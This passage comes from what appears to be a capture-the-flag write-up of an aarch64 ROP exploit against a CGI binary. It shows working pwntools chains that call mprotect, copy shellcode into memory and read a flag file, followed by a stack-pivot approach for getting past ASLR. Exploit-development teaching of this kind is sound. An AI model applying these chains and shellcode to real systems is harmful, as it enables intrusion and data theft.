$ ropper -f pwn.cgi --search "svc #0"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: svc #0
[INFO] File: pwn.cgi
0x000000000041f45c: svc #0; cmn w0, #1, lsl #12; b.hi #0x1f470; mov w0, #0; ret;
0x000000000041f388: svc #0; cmn x0, #0xfff; b.hs #0x1f398; ret;
(...)
0x00000000004138e0: svc #0; ret;
We can also call mprotect directly, as it is in our binary:
(gdb) x /10i mprotect
0x420440 <mprotect>: nop
0x420444 <mprotect+4>: mov x8, #0xe2 // #226
0x420448 <mprotect+8>: svc #0x0
0x42044c <mprotect+12>: cmn x0, #0xfff
0x420450 <mprotect+16>: b.cs 0x420458 <mprotect+24> // b.hs, b.nlast
0x420454 <mprotect+20>: ret
0x420458 <mprotect+24>: b 0x424900 <__syscall_error>
Which should save us from having to look up one extra gadget.
Return to x30
In aarch64, ret doesn’t pop anything from the stack; instead, the processor jumps to whatever is in the x30 register. So we need to take that into account when looking for gadgets.
Some of the gadgets will do ldp x29, x30, [sp], #something, ..., ret, meaning that they will load x30 from the stack, advance the stack, and then return to x30. If after that one we use a gadget with a simple ret, like the one above, we will end up in an infinite loop (x30 will not be changing).
One option is to use a gadget that branches using another register (only br, as blr also sets the link register).
The idea to execute ret-only gadgets would be to find a gadget that does:
- ldp/ldr xN, [sp, #k]
- ldp x29, x30, [sp], #something
- br xN
We don’t really care about the order of the first two, though. I used the following query in ropper to find one such gadget:
$ ropper -f pwn.cgi --search "%ldp x29, x30%br"
(...)
0x000000000042b788: ldr x16, [sp, #0x60]; ldp x0, x1, [sp, #0x90]; ldp x29, x30, [sp], #0x100; br x16;
0x0000000000427d0c: ldr x16, [sp, #0x60]; ldp x1, x0, [sp, #0x78]; ldp x29, x30, [sp], #0xb0; br x16;
0x000000000042988c: ldr x16, [sp, #0x60]; ldp x29, x30, [sp], #0xf0; br x16;
(...)
Let’s take a look at the second one:
0x0000000000427d0c:
ldr x16, [sp, #0x60];
ldp x1, x0, [sp, #0x78];
ldp x29, x30, [sp], #0xb0;
br x16;
- Load x16 from the stack (sp + 0x60) ✓
- Load x1, x0 from the stack (sp + 0x78, sp + 0x80) ✓
- Load x29, x30 from the stack and advance it by 0xb0 ✓
- Branch to x16 ✓
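It is easy to mix up which register comes from which slot (ldp x1, x0 loads x1 first), so I find it useful to let a script do the bookkeeping. The sketch below parses a ropper-style gadget string and reports, for every register loaded from sp, its offset from the stack pointer at gadget entry. It only understands the ldr/ldp forms seen in this write-up, and stack_loads is a hypothetical helper.

```python
import re

# ldr xA, [sp, #k] / ldp xA, xB, [sp, #k] / ldp xA, xB, [sp], #post
LOAD_RE = re.compile(
    r'(ldr|ldp)\s+(x\d+)(?:,\s*(x\d+))?,\s*\[sp(?:,\s*#(0x[0-9a-f]+|\d+))?\]'
    r'(?:,\s*#(0x[0-9a-f]+|\d+))?'
)


def stack_loads(gadget: str):
    """Return ({register: offset from entry sp}, total sp advance) for a gadget."""
    slots = {}
    advance = 0
    for insn in gadget.split(';'):
        m = LOAD_RE.fullmatch(insn.strip())
        if not m:
            continue  # not a load from sp (e.g. the final br)
        op, reg1, reg2, off, post = m.groups()
        base = advance + (int(off, 0) if off else 0)
        slots[reg1] = base
        if op == 'ldp':
            slots[reg2] = base + 8  # second register of the pair
        if post:
            advance += int(post, 0)  # post-index: sp moves after the load
    return slots, advance


if __name__ == '__main__':
    g = 'ldr x16, [sp, #0x60]; ldp x1, x0, [sp, #0x78]; ldp x29, x30, [sp], #0xb0; br x16;'
    print(stack_loads(g))
```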
So we can put the address of mprotect in x16, the first two arguments in x0 and x1, and then the address of the next gadget in x30.
Calling mprotect
Finding an x2-load gadget.
We have found a gadget that allows us to call mprotect with custom values of x0 and x1. Remember that mprotect takes three parameters:
int mprotect(void* addr, size_t size, int flags)
So we need a gadget that sets x2 with the flags that we want (PROT_READ|PROT_WRITE|PROT_EXEC). Again, we have multiple options:
- Find a gadget that sets that specific constant in x2.
- Find a gadget that loads a value into x2 from the stack.
- Mov from a previously controlled register into x2.
The queries for the first two options didn’t yield anything useful:
$ ropper -f pwn.cgi --search "mov x2, #"
$ ropper -f pwn.cgi --search "ldr x2,"
But the last one did:
$ ropper -f pwn.cgi --search "mov x2, x%"
(...)
0x00000000004057dc: mov x2, x23; mov x1, x27; mov x0, x26; blr x24;
(...)
This gadget will:
- Move x23 into x2 (we control x23, as it was picked up from the stack). ✓
- Move x27 into x1 (we don’t care, as we will overwrite it).
- Move x26 into x0 (we don’t care, as we will overwrite it).
- Branch with link into x24 (we control x24, as it was picked up from the stack). ✓
Testing the partial chain
So now we can do:
- Stack pivot gadget, setting:
  - x30 (sp + 0x08) to the x2-load gadget address (0x4057dc).
  - x23 (sp + 0x30) to PROT_READ|PROT_WRITE|PROT_EXEC.
  - x24 (sp + 0x38) to the x16-branch gadget address (0x427d0c).
- x2-load gadget. No stack usage.
- x16-branch gadget, setting:
  - x16 (sp + 0x60) to mprotect.
  - x1 (sp + 0x78) to the mapping size.
  - x0 (sp + 0x80) to the mapping address.
  - x30 (sp + 0x08) to the address of the next gadget (print address).
  - Some extra data to fill the stack (the gadget advances the stack by 0xb0 bytes).
Which address do we want to mprotect? Well, let’s see which mappings are available.
$ readelf -Wl ./pwn.cgi
Elf file type is EXEC (Executable file)
Entry point 0x400700
There are 6 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
LOAD 0x000000 0x0000000000400000 0x0000000000400000 0x07de74 0x07de74 R E 0x10000
LOAD 0x07e830 0x000000000048e830 0x000000000048e830 0x0057f8 0x00ae98 RW 0x10000
NOTE 0x000190 0x0000000000400190 0x0000000000400190 0x000044 0x000044 R 0x4
TLS 0x07e830 0x000000000048e830 0x000000000048e830 0x000020 0x000068 R 0x8
GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10
GNU_RELRO 0x07e830 0x000000000048e830 0x000000000048e830 0x0037d0 0x0037d0 R 0x1
We can pick the last page of the executable segment, hoping that it will not collide with any code that we need.
So mapping_addr = 0x47d000, mprotect_size = 0x1000.
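The numbers above come straight from the first LOAD segment in the readelf output. As a sketch (assuming 4 KiB pages, and spelling out the Linux PROT_* values instead of importing them; last_page is my own helper name):

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

# Linux protection flags, written out so the snippet has no dependencies.
PROT_READ, PROT_WRITE, PROT_EXEC = 1, 2, 4


def last_page(vaddr: int, memsz: int, page_size: int = PAGE_SIZE) -> int:
    """Start of the page that holds the last byte of a segment."""
    return (vaddr + memsz - 1) & ~(page_size - 1)


if __name__ == '__main__':
    mapping_addr = last_page(0x400000, 0x07de74)  # R E segment from readelf
    flags = PROT_READ | PROT_WRITE | PROT_EXEC
    print(hex(mapping_addr), hex(PAGE_SIZE), flags)
```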
import mmap
def rop():
    keyvals = [
        b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
        b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
    ]
    payload = b'&'.join(keyvals)
    payload += b'\x00' * (0x58 - len(payload))
    elf = pwn.ELF('./pwn.cgi')
    rop = pwn.ROP(elf)
    mprotect_addr = 0x420440
    mapping_addr = 0x47d000
    mprotect_size = 0x1000
    mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
    rop.raw(0xdeadbeef) # x29
    rop.raw(0x4057dc) # x30, x2-load gadget
    rop.raw(0xdeadbeef) # x19
    rop.raw(0xdeadbeef) # x20
    rop.raw(0xdeadbeef) # x21
    rop.raw(0xdeadbeef) # x22
    rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
    rop.raw(0x427d0c) # x24, x16-branch gadget
    """
    The x2-load gadget doesn't touch the stack.
    It will branch to x24, x16-branch gadget.
    0x4057dc:
    mov x2, x23;
    mov x1, x27;
    mov x0, x26;
    blr x24;
    """
    """
    The x16-branch gadget loads x16, x1, x0, x29 and x30 from
    the stack, advances the stack and branches to x16.
    0x427d0c:
    ldr x16, [sp, #0x60];
    ldp x1, x0, [sp, #0x78];
    ldp x29, x30, [sp], #0xb0;
    br x16;
    """
    rop.raw(0xdeadbeef) # x29
    rop.raw(0x00400684) # x30, puts function.
    for i in range((0x60-0x10)//8):
        rop.raw(0xdeadbeef) # filling until 0x60
    rop.raw(mprotect_addr) # sp + 0x60
    rop.raw(0xdeadbeef) # sp + 0x68
    rop.raw(0xdeadbeef) # sp + 0x70
    rop.raw(mprotect_size) # sp + 0x78 x1, size
    rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
    for i in range((0xb0 - 0x88)//8):
        rop.raw(0xdeadbeef) # Filling until 0xb0.
    payload += rop.chain()
    return payload
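Counting filler qwords by hand gets error-prone as the chain grows. An alternative, shown here only as a sketch with the standard library, is to describe a gadget’s frame as a map from stack offset to value and let a helper fill the rest (frame_from_offsets is a made-up name; the offsets are the ones used by the x16-branch gadget):

```python
import struct


def frame_from_offsets(size: int, slots: dict, filler: int = 0xdeadbeef) -> bytes:
    """Build `size` bytes of stack, placing each value at its byte offset."""
    if size % 8:
        raise ValueError('frame size must be a multiple of 8')
    words = [filler] * (size // 8)
    for offset, value in slots.items():
        if offset % 8 or not 0 <= offset < size:
            raise ValueError(f'bad slot offset: {offset:#x}')
        words[offset // 8] = value
    return struct.pack(f'<{len(words)}Q', *words)


if __name__ == '__main__':
    frame = frame_from_offsets(0xb0, {
        0x08: 0x400684,  # x30: where mprotect returns to (the puts call)
        0x60: 0x420440,  # x16: mprotect
        0x78: 0x1000,    # x1: size
        0x80: 0x47d000,  # x0: mapping address
    })
    print(len(frame))
```

The resulting bytes should match what the second half of the chain above produces with rop.raw.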
We can follow along with gdb!
>>> payload = rop()
>>> run_with_gdb(payload)
(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) b *0x400998
Breakpoint 5 at 0x400998
(gdb) c
Continuing.
Breakpoint 5, 0x0000000000400998 in parse_body ()
(gdb) x /20i $pc
=> 0x400998 <parse_body+312>: ldp x19, x20, [sp, #16]
0x40099c <parse_body+316>: ldp x21, x22, [sp, #32]
0x4009a0 <parse_body+320>: ldp x23, x24, [sp, #48]
0x4009a4 <parse_body+324>: ldp x29, x30, [sp], #160
0x4009a8 <parse_body+328>: ret
(gdb) x /2gx $sp
0x550079b2d0: 0x00000055007ce090 0x0000000000440408
We can see that x29 and x30 will take our buffer addr and the stack pivot gadget address. After a few more instructions, we execute the ret:
(gdb) si
0x0000000000440408 in is_trusted_path_normalize ()
(gdb) x /6i $pc
=> 0x440408 <is_trusted_path_normalize+280>: mov sp, x29
0x44040c <is_trusted_path_normalize+284>: ldp x19, x20, [sp, #16]
0x440410 <is_trusted_path_normalize+288>: ldp x21, x22, [sp, #32]
0x440414 <is_trusted_path_normalize+292>: ldp x23, x24, [sp, #48]
0x440418 <is_trusted_path_normalize+296>: ldp x29, x30, [sp], #64
0x44041c <is_trusted_path_normalize+300>: ret
(gdb) si
0x000000000044040c in is_trusted_path_normalize ()
(gdb) p /x $sp
$13 = 0x55007ce090
(gdb) x /10gx $sp
0x55007ce090: 0x00000000deadbeef 0x00000000004057dc # x29, x30
0x55007ce0a0: 0x00000000deadbeef 0x00000000deadbeef # x19, x20
0x55007ce0b0: 0x00000000deadbeef 0x00000000deadbeef # x21, x22
0x55007ce0c0: 0x0000000000000007 0x0000000000427d0c # x23, x24
0x55007ce0d0: 0x00000000deadbeef 0x0000000000400684
After a few more instructions, we are in the x2-load gadget:
(gdb) si
0x00000000004057dc in msort_with_tmp.part ()
(gdb) x /4i $pc
=> 0x4057dc <msort_with_tmp.part.0+156>: mov x2, x23
0x4057e0 <msort_with_tmp.part.0+160>: mov x1, x27
0x4057e4 <msort_with_tmp.part.0+164>: mov x0, x26
0x4057e8 <msort_with_tmp.part.0+168>: blr x24
(gdb) p /x $x23
$14 = 0x7
(gdb) p /x $x24
$15 = 0x427d0c
And from there, we should get to the x16-branch gadget:
(gdb) x /4i $pc
=> 0x427d0c <__gconv_transform_internal_ucs4le+972>: ldr x16, [sp, #96]
0x427d10 <__gconv_transform_internal_ucs4le+976>: ldp x1, x0, [sp, #120]
0x427d14 <__gconv_transform_internal_ucs4le+980>: ldp x29, x30, [sp], #176
0x427d18 <__gconv_transform_internal_ucs4le+984>: br x16
(gdb) x /6gx $sp + 0x60
0x55007ce130: 0x0000000000420440 0x00000000deadbeef # mprotect address, _
0x55007ce140: 0x00000000deadbeef 0x0000000000001000 # _, size
0x55007ce150: 0x000000000047d000 0x00000000deadbeef # mapping address
(gdb) x /2gx $sp
0x55007ce0d0: 0x00000000deadbeef 0x0000000000400684 # x29, x30
And from there, to mprotect:
(gdb) si
0x0000000000420440 in mprotect ()
(gdb) x /5i $pc
=> 0x420440 <mprotect>: nop
0x420444 <mprotect+4>: mov x8, #0xe2 // #226
0x420448 <mprotect+8>: svc #0x0
0x42044c <mprotect+12>: cmn x0, #0xfff
0x420450 <mprotect+16>: b.cs 0x420458 <mprotect+24> // b.hs, b.nlast
(gdb) si
0x0000000000420444 in mprotect ()
(gdb) si
0x0000000000420448 in mprotect ()
(gdb) si
0x0000000000420450 in mprotect ()
(gdb) p /x $x0
$16 = 0x0
mprotect succeeded ✅︎
We can check that by running it with strace:
>>> print(run_with_strace(payload).decode())
(...)
Content-type: text/html
14230 write(1,0x49b020,24) = 24
14230 write(1,0x49b020,1) = 1
14230 mprotect(0x000000000047d000,4096,PROT_EXEC|PROT_READ|PROT_WRITE) = 0
<h1>Please provide your name with the name= parameter.</h1>
14230 write(1,0x49b020,60) = 60
(...)
Executing our own code
Our goal is to get control over that process. We want to execute arbitrary code, and using rop is tedious. Now that we have a writable and executable region of memory, we can write our own code to it.
Writing a small shellcode
Let’s start by writing a simple shellcode that writes a custom string to stdout.
From the syscalls table, we know that we need to put:
- 0x40 in x8
- 0x1 in x0
- a string in x1
- the size in x2
Let’s also call exit so we close the program, that’s 0x5d:
def shellcode():
code = pwn.asm("""
mov x8, #0x40
mov x0, #1
adr x1, hello_world
mov x2, #hello_world_len
svc #0
mov x8, #0x5d
mov x0, #0
svc #0
hello_world:
.asciz "Hello, World\\n"
hello_world_len = . - hello_world
""")
return code
Copying the code
Now for the tedious part… We need to copy our code to the executable page… using rop.
We can use a gadget like this one:
0x00000000004450fc:
str x20, [x19, #8];
ldp x19, x20, [sp, #0x10];
ldp x29, x30, [sp], #0x20;
ret;
That writes x20 into the address pointed by x19 + 8, loads x29, x30, x19, x20 and returns. We can repeat this gadget to copy 8 bytes at a time.
Our first gadget should be a subset of this one, without the write, so we can have control over x19 and x20:
0x0000000000445100:
ldp x19, x20, [sp, #0x10];
ldp x29, x30, [sp], #0x20;
ret;
So now let’s write our memcpy implementation!
def memcpy(rop, dst, data, return_addr):
    # Callers must start by jumping into `0x445100`
    # We have control over everything that's next on the stack.
    memcpy_gadget = 0x4450fc
    while len(data) > 8:
        rop.raw(0xdeadbeef) # x29
        rop.raw(memcpy_gadget) # x30
        rop.raw(dst - 0x8) # x19
        rop.raw(pwn.u64(data[:8])) # x20
        dst += 0x8
        data = data[8:]
    # Copy the last part, padded with NUL bytes up to 8 bytes.
    data += b'\x00' * 8
    rop.raw(0xdeadbeef) # x29
    rop.raw(memcpy_gadget) # x30
    rop.raw(dst - 0x8) # x19
    rop.raw(pwn.u64(data[:8])) # x20
    # This will perform the last store
    # And jump to return_addr.
    rop.raw(0xdeadbeef) # x29
    rop.raw(return_addr) # x30
    rop.raw(0xdeadbeef) # x19
    rop.raw(0xdeadbeef) # x20
    return
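To convince ourselves that the chain really copies the data, here is a rough pure-Python model of the two gadgets. It is only a sketch: build_copy_chain and simulate are names invented for this example, the "stack" is a list of 64-bit words, and only the store and the register loads are modelled. Unlike memcpy above, it emits no store for empty data.

```python
import struct

LOAD_GADGET = 0x445100   # ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret
STORE_GADGET = 0x4450fc  # str x20, [x19, #8]; then falls through into LOAD_GADGET

def build_copy_chain(dst, data, return_addr):
    """Return the 64-bit stack words, following the layout memcpy() emits."""
    data = data + b"\x00" * (-len(data) % 8)  # pad to a multiple of 8 bytes
    words = []
    for off in range(0, len(data), 8):
        (value,) = struct.unpack("<Q", data[off:off + 8])
        # x29, x30, x19, x20
        words += [0xdeadbeef, STORE_GADGET, dst + off - 8, value]
    # Final frame: the last store happens, then we return to return_addr.
    words += [0xdeadbeef, return_addr, 0xdeadbeef, 0xdeadbeef]
    return words

def simulate(words):
    """Run the two gadgets over the chain; return (memory, final pc)."""
    memory = {}
    sp, pc = 0, LOAD_GADGET  # callers enter through the load-only gadget
    x19 = x20 = 0
    while pc in (LOAD_GADGET, STORE_GADGET):
        if pc == STORE_GADGET:
            memory[x19 + 8] = x20                 # str x20, [x19, #8]
        x19, x20 = words[sp + 2], words[sp + 3]   # ldp x19, x20, [sp, #0x10]
        pc = words[sp + 1]                        # x30, consumed by ret
        sp += 4                                   # sp += 0x20
    return memory, pc
```

Feeding it a 13-byte string produces two 8-byte stores starting at dst, and the simulated pc ends up at return_addr.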
Updating our rop-chain
Our updated code looks like this (note that we need to change the puts addr to the memcpy address):
import mmap
def rop():
keyvals = [
b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
]
payload = b'&'.join(keyvals)
payload += b'\x00' * (0x58 - len(payload))
elf = pwn.ELF('./pwn.cgi')
rop = pwn.ROP(elf)
mprotect_addr = 0x420440
mapping_addr = 0x47d000
mprotect_size = 0x1000
mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
rop.raw(0xdeadbeef) # x29
rop.raw(0x4057dc) # x30, x2-load gadget
rop.raw(0xdeadbeef) # x19
rop.raw(0xdeadbeef) # x20
rop.raw(0xdeadbeef) # x21
rop.raw(0xdeadbeef) # x22
rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
rop.raw(0x427d0c) # x24, x16-branch gadget
"""
The x2-load gadget doesn't touch the stack.
It will branch to x24, x16-branch gadget.
0x4057dc:
mov x2, x23;
mov x1, x27;
mov x0, x26;
blr x24;
"""
"""
The x16-branch gadget loads x16, x1, x0, x29 and x30 from
the stack, advances the stack and branches to x16.
0x427d0c:
ldr x16, [sp, #0x60];
ldp x1, x0, [sp, #0x78];
ldp x29, x30, [sp], #0xb0;
br x16;
"""
rop.raw(0xdeadbeef) # x29
rop.raw(0x00445100) # x30, memcpy addr.
for i in range((0x60-0x10)//8):
rop.raw(0xdeadbeef) # filling until 0x60
rop.raw(mprotect_addr) # sp + 0x60
rop.raw(0xdeadbeef) # sp + 0x68
rop.raw(0xdeadbeef) # sp + 0x70
rop.raw(mprotect_size) # sp + 0x78 x1, size
rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
for i in range((0xb0 - 0x88)//8):
rop.raw(0xdeadbeef) # Filling until 0xb0.
code = shellcode()
memcpy(rop, mapping_addr, code, mapping_addr)
payload += rop.chain()
return payload
>>> payload = rop()
>>> run(payload)
b'Content-type: text/html\n\nHello, World\n\x00'
Printing out the flag.
Now that we can write our own code, to win the challenge we need to print out the flag. So let’s modify our shellcode to openat (0x38) the file stored in /flag, read it to a stack buffer, and print it via stdout.
Let’s create a temporary flag for now, in /tmp while we test locally:
$ echo -n "srelabs{fake-flag}" > /tmp/flag
def shellcode():
code = pwn.asm("""
mov x8, #0x40
mov x0, #1
adr x1, hello_world
mov x2, #hello_world_len
svc #0
// Open the flag.
mov x8, #0x38 // SYS_openat
mov x0, #-100 // AT_FDCWD
adr x1, flag_path
mov x2, #0 // O_RDONLY
svc #0
// Store the fd on a register.
mov x20, x0
// Read it into the stack.
mov x8, #0x3f // SYS_read
mov x0, x20
sub x1, sp, #0x100
mov x2, #0x100
svc #0
// x0 has the size of the read.
mov x21, x0
// Write it into stdout
mov x8, #0x40
mov x0, #1
sub x1, sp, #0x100
mov x2, x21
svc #0
mov x8, #0x5d
mov x0, #0
svc #0
flag_path:
.asciz "/tmp/flag"
hello_world:
.asciz "Hello, World\\n"
hello_world_len = . - hello_world
""")
return code
>>> payload = rop()
>>> print(run(payload).decode())
Content-type: text/html
Hello, World
srelabs{fake-flag}
Success! ✅︎
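For readers less used to aarch64 assembly, the flag-dumping part of the shellcode does roughly the equivalent of this Python sketch. It only illustrates the syscall sequence (openat, read, write); dump_file is a hypothetical helper and not part of the exploit.

```python
import os

def dump_file(path, out_fd=1, size=0x100):
    """Open path read-only, read up to size bytes, write them to out_fd."""
    fd = os.open(path, os.O_RDONLY)   # openat(AT_FDCWD, path, O_RDONLY)
    try:
        data = os.read(fd, size)      # read(fd, buf, 0x100)
    finally:
        os.close(fd)
    os.write(out_fd, data)            # write(1, buf, n)
    return len(data)
```

Calling dump_file("/tmp/flag") would print the fake flag created above to stdout, just like the shellcode does.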
Overcoming ASLR
Using a real machine.
At some point, I decided to get a real arm64 machine. Luckily, multiple cloud providers allow you to spawn arm64 instances for cheap. For example, GCE, AWS EC2, Hetzner, and Oracle Cloud. After the VM is provisioned, you can install apache2 and enable the CGI-bin module. With that, you should have a setup very close to the one used in the challenge.
You can use similar scripts to run it locally, or against the HTTP server. For gdb, I wrote a function that saves the payload to a file, and then I just run the program with that file as input.
If we try to run our script there, we will see it failing every time: we need to guess the exact layout up to 3 bytes deep. We can maybe shorten that by doing a huge rop-slide, but it’s still too much.
Address Space Layout Assumptions
If we reflect upon our assumptions, the only assumptions that we made were:
- The location of the x30 register (2 bytes).
- The location of the x29 register (2 bytes).
- The location of our read buffer (3 bytes).
The first two are not 2 bytes exactly, as we know they are next to each other, and one ends with an 8 and the other with a 0, so it’s basically 3 nibbles. We can bruteforce that. But guessing the read buffer is more challenging.
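To make the "3 nibbles" concrete, here is a small sketch that enumerates the candidate values for the low 16 bits of the two slots. It assumes, as in the gdb session above, that the saved x29 sits at sp and the saved x30 at sp + 8, and that sp is 16-byte aligned. The name candidate_slots is invented for this example.

```python
def candidate_slots():
    """Yield (x29_low16, x30_low16) for every 16-byte-aligned sp."""
    for sp_low16 in range(0, 0x10000, 0x10):
        yield sp_low16, sp_low16 + 0x8

candidates = list(candidate_slots())
print(len(candidates))  # 4096 == 16 ** 3
```

If the stack placement were uniformly distributed (which is an assumption, not something measured here), a single fixed guess would hit about once every 4096 runs.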
I spent a ton of time thinking about this; you can read more in the “Failed Experiments” section. In the end, I decided that it was not feasible to guess the stack address, and that it might instead be available somewhere.
Register State Analysis
I set up a breakpoint at the end of parse_body, and analyzed both the stack and the registers… And I couldn’t find anything.
I looked for gadgets that would let me add arbitrary stuff to the sp, which would allow me to get to the read buffer. I found this gadget:
0x000000000042152c:
ldp x29, x30, [sp];
ldr x19, [sp, #0x10];
add sp, sp, x12;
ret;
Which, if we control x12, would let us jump straight to our buffer. I tried multiple things, but I could not change the value of x12:
x12 0x5950
Note
In QEMU, it seems like x12 is modified during parse_body, but in the arm VM it is not. This seems to be because in QEMU, libc decides to use __memcpy_generic during strncpy, whereas in the VM it uses __memcpy_simd. It is probable that on the real challenge, they also use __memcpy_simd.
This value is not large enough to reach our read buffer (we need at least 4000*0x34 = 208000 bytes).
However, while testing solutions trying to see what registers we do control, I noticed that if we provide the 0x34 key-value pairs, we get x7 pointing to the position after the last &. This means that if we find a way to pivot the stack into the value stored in x7, we should be able to win.
def test_x7():
    payloads = [b'a=b&'] * 0x34
    payload = b''.join(payloads)
    payload += pwn.p32(0xdeadbeef)
    return payload
>>> run_with_gdb(test_x7())
(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) c
Continuing.
Breakpoint 6, 0x0000000000400998 in parse_body ()
(gdb) p /x $x7
$19 = 0x55007ce108
(gdb) x /1gx $x7
0x55007ce108: 0x00000000deadbeef
We now have a register that tells us where the stack is, let’s see if we can do a stack pivot with that somehow.
Hunting for stack pivot gadgets
The first thing we want to see is if there’s a way to work with x7: storing it into the stack, moving it into another register, etc.
I found a few that were not complete garbage:
0x000000000040597c: str x7, [sp, #0x70]; mov x0, x26; blr x24;
0x000000000044615c: str x7, [sp, #0x108]; stp q0, q16, [x8]; bl #0x45930; ldp x29, x30, [sp], #0x110; ret;
0x0000000000445fc4: str x7, [sp, #0x108]; stp q16, q17, [x8]; bl #0x45930; ldp x29, x30, [sp], #0x110; ret
The first one in particular seems simple enough: it stores x7 in the stack, then branches to x24 (which was restored from the stack at the end of parse_body). So we can use that to chain another rop gadget.
We now need to somehow pick up that value from the stack. We already have a gadget that moves x29 into sp, so we just need a way to load it into x29.
0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;
The first time we execute that rop gadget, we will load x29 and x30 from the stack, and increment the stack by 0x70. If we execute this gadget twice, the second time the stack would be where we stored x7, and the value will be loaded into x29. From there, we can do a normal stack pivot.
So our rop chain now becomes something like this:
0x000000000040597c: str x7, [sp, #0x70]; mov x0, x26; blr x24;
0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;
0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;
0x0000000000440408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
And we need to:
- Override parse_body’s x30 in the stack, making it point to the x7-store gadget (0x40597c).
- Override parse_body’s x24 in the stack, making it point to the stack-advance gadget (0x40c46c).
- Override sp + 160 + 0x8, making it point to the stack-advance gadget.
- Override sp + 160 + 0x70 + 0x8, making it point to the stack-pivot gadget (0x440408).
It’s a bit tricky, because we need to modify 4 values, and each iteration of the key-value modification loop advances the pointer by 2000 bytes. However, given that we are modifying 2 bytes, as long as we stay within the same 16-bit boundary, we are fine.
Let’s see an example:
Let’s assume parse_body’s sp is at 0xffffff50e300. From there, keys will be 0xe8 bytes after, so it would be at 0xffffff50e3e8, and the next pointer will be 2000 bytes from it, at 0xffffff50ebb8, and so on. The first 6 values will be:
0xffffff50e3e8
0xffffff50ebb8
0xffffff50f388
0xffffff50fb58
0xffffff510328 # <- changes more than 2 bytes
0xffffff510af8
In this particular scenario, we can only write 4 values, but if we get a stack layout starting at a lower number, we would have more opportunities to write. We will explore that after we finish with the exploit.
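The same arithmetic can be sketched in a few lines of Python. This is just an illustration of the reasoning above: it assumes the 0xe8 offset and the 2000-byte stride from the example, and key_slots / usable_slots are names made up here.

```python
KEYS_OFFSET = 0xe8  # distance from parse_body's sp to the first key slot
KEY_STRIDE = 2000   # bytes between consecutive key slots

def key_slots(sp, count):
    """Addresses of the first count key slots for a given sp."""
    return [sp + KEYS_OFFSET + i * KEY_STRIDE for i in range(count)]

def usable_slots(sp, count=0x34):
    """Slots whose address differs from sp only in the low 16 bits."""
    return [addr for addr in key_slots(sp, count) if addr >> 16 == sp >> 16]

sp = 0xffffff50e300
for addr in key_slots(sp, 6):
    status = "ok" if addr >> 16 == sp >> 16 else "crosses the boundary"
    print(hex(addr), status)
print(len(usable_slots(sp)))  # 4
```

A lower value in the low 16 bits of sp leaves more slots before the boundary is crossed, which is what the later multi-attempt payload relies on.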
The values that we need to modify are:
- sp + 0x08 (x30 on stack)
- sp + 0x38 (x24 on stack)
- sp + 160 + 0x08 (where the third gadget will be loaded from)
- sp + 160 + 0x70 + 0x08 (where the fourth gadget will be loaded from)
With our sp value of 0xffffff50e300, this will make:
0xffffff50e308
0xffffff50e338
0xffffff50e3a8
0xffffff50e418
However, there’s a problem with these addresses: the second one has a 0x38 byte. It took me a while to debug it, but 0x38 is &, so that would break everything (remember: we have to avoid NUL-bytes, & and =).
Let’s come up with a different address… like this one: 0xffffe55f9d10, this will get us:
0xffffe55f9d18
0xffffe55f9d48
0xffffe55f9db8
0xffffe55f9e28
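As a sanity check, the four targets can be derived from sp by following the gadgets one by one. The sketch below assumes the frame sizes seen in the disassembly (160 bytes for parse_body’s epilogue, 0x70 for the stack-advance gadget); the function names are invented for this example.

```python
import struct

FRAME = 160     # bytes popped by parse_body's epilogue
ADVANCE = 0x70  # bytes popped by the stack-advance gadget (0x40c46c)

def overwrite_targets(sp):
    """Addresses of the four stack slots to overwrite, in chain order."""
    return [
        sp + 0x08,                    # saved x30 -> x7-store gadget
        sp + 0x38,                    # saved x24 -> stack-advance gadget
        sp + FRAME + 0x08,            # x30 for the second stack-advance
        sp + FRAME + ADVANCE + 0x08,  # x30 for the stack-pivot gadget
    ]

def x7_slot(sp):
    """Where `str x7, [sp, #0x70]` writes once the epilogue popped FRAME."""
    return sp + FRAME + 0x70

sp = 0xffffe55f9d10
for addr in overwrite_targets(sp):
    # Full address, then the two little-endian bytes used in the payload.
    print(hex(addr), struct.pack("<H", addr & 0xffff).hex())
```

Note that x7_slot(sp) equals sp + FRAME + ADVANCE, which is exactly where the second run of the stack-advance gadget loads x29 from.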
And with that, we can start writing our payload:
def rop():
keyvals = [
b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(0x9d18),
b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9d48),
b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9db8),
b'\x08\x04\x44=' + b'a'*28 + pwn.p16(0x9e28),
]
keyvals += [b'a=b'] * (0x34 - len(keyvals))
# The last entry should leave the stack aligned on a 16-byte boundary.
# As aarch64 will crash if sp is not aligned to 16 bytes.
# the read buffer starts at an address ending with 8, so we need
# to add an extra 8 bytes to align it to 16 bytes.
payload = b'&'.join(keyvals) + b'a='
payload += b'b' * (16 - (len(payload) % 16) - 1) + b'x' * 8 + b'&'
"""
If everything went well, we are executing the stack pivot gadget:
0x0000000000440408:
mov sp, x29;
ldp x19, x20, [sp, #0x10];
